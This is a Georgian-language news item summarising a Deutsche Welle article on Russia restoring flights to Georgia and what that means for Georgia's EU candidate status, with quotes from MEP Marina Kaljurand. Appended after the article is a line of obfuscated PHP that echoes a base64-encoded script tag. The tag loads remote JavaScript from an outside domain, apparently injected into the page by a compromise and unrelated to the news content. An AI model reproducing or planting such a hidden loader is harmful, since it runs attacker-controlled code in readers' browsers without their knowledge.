celsiusi
ავერსი საქკაბელი

"რუსეთთან ფრენების აღდგენით საქართველო ევროკავშირის კანდიდატის სტატუსს რისკის ქვეშ აყენებს" - ამ სათაურით გერმანული გამოცემა Deutsche Welle საქართველოში ბოლო დროს განვითარებულ მოვლენებთან დაკავშირებით ვრცელ სტატიას აქვეყნებს.

სტატიაში საუბარია რუსეთის პრეზიდენტის, ვლადიმერ პუტინის გადაწყვეტილებაზე, იმის შესახებ, რომ მან საქართველოსთან აღადგინა ფრენები და გააუქმა სავიზო რეჟიმი. სტატიის ავტორი წერს, რომ  მაშინ, როცა კრიტიკოსები ამ ნაბიჯს რუსულ პროვოკაციად აფასებენ, საქართველოს მთავრობა გადაწყვეტილებას მიესალმება.
სტატიაში საუბარია იმაზე, რომ რუსეთთან პირდაპირი ფრენების აღდგენამ გამოიწვია შეშფოთება საქართველოს ევროკავშირის კანდიდატის სტატუსის მიღების პერსპექტივასთან დაკავშირებით.
ამავე კონტექსტში მედიასთან ევროპარლამენტარმა მარია კალიურანდმა ისაუბრა:
"ბრიუსელი განიხილავს იურიდიულ და სტატისტიკურ ინფორმაციას, მაგრამ ევროკავშირის კანდიდატის სტატუსი უპირველეს ყოვლისა პოლიტიკური გადაწყვეტილებაა. ის ასევე ეფუძნება იმას, თუ რა შთაბეჭდილებას ახდენს ქვეყანა", - თქვა მან.
გარდა ამისა, კალიურანდმა აღნიშნა, რომ კანდიდატის სტატუსისთვის არც უკრაინა და მოლდოვა იყვნენ მზად, თუმცა "ომმა მათთვის ახალი შესაძლებლობების ფანჯარა გახსნა, მათმა მთავრობამ კი ევროკავშირის გზის მიმართ ძლიერი პოლიტიკური ერთგულება აჩვენა".
სტატიის ავტორმა ასევე ისაუბრა NDI-ის უახლოეს კვლევებზეც, რომლის თანახმადაც, საქართველოს მოსახლეობის 81% ევროკავშირისა და NATO-ს წევრობას უმთავრეს პრიორიტეტად მიიჩნევს. აქვე სტატიის ავტორმა აღნიშნა, რომ მარტის აქციებმა აჩვენა უთანხმოება ხელისუფლების ქმედებებსა და ქართველი ხალხის ნებას შორის. ამის მიუხედავად კალიურანდი აცხადებს, რომ კანდიდატის სტატუსის გადაწყვეტისას ევროკავშირი ქართველ ხალხსა და საქართველოს მთავრობას ერთმანეთისგან არ გამიჯნავს.
"ბრიუსელში ეს დილემა არაა. კანდიდატის სტატუსის გადაწყვეტისას ჩვენ საქართველოს მთავრობასა და ქართველ ხალხს ვხედავთ, როგორც ერთს. ჩვენ არ შეგვიძლია ქართველი ხალხი, მისი მთავრობის გარეშე შევიყვანოთ ევროკავშირში. საქართველოში არის დემოკრატია, ეს არ არის ჩრდილოეთ კორეა ან რუსეთი. ქართველებს აქვთ პოლიტიკური არჩევანის თავისუფლება", - თქვა ევროპარლამენტარმა.
279
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");